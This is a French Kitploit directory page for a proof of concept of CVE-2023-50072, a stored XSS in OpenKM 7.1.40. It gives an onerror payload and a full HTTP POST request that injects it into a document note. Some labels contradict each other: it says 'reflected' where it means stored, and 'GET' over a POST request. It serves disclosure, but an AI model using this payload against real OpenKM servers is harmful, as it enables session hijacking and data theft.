Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-50072 — Une vulnérabilité de script intersite stocké (XSS) existe dans OpenKM version 7.1.40. | Kitploit
Outils/GitHubGitHub/ahrixia/cve-2023-50072
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubahrixia/cve-2023-50072

CVE-2023-50072

Une vulnérabilité de script intersite stocké (XSS) existe dans OpenKM version 7.1.40.

Voir le dépôt
42il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-50072

Une vulnérabilité de cross-site scripting (XSS) stocké existe dans OpenKM version 7.1.40 (dbb6e88) avec l’extension Professional, permettant à un utilisateur authentifié de téléverser une note sur un fichier, qui agit comme une charge utile XSS stocké. Tout utilisateur qui ouvre la note d’un fichier document déclenchera le XSS.

Paramètre vulnérable : text

Exploitation - Preuve de concept (POC)

Cross-site scripting (XSS) réfléchi

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

Requête GET sur [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

Impact

Le XSS stocké permet aux attaquants d’injecter des scripts malveillants dans une application web ; ceux-ci sont stockés et exécutés lorsque d’autres utilisateurs consultent la page affectée. Cela peut conduire au vol d’informations sensibles, au détournement de session ou à la distribution de logiciels malveillants.

Capture d’écran

openkm

Autres charges utiles fonctionnelles

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
Télécharger l’outil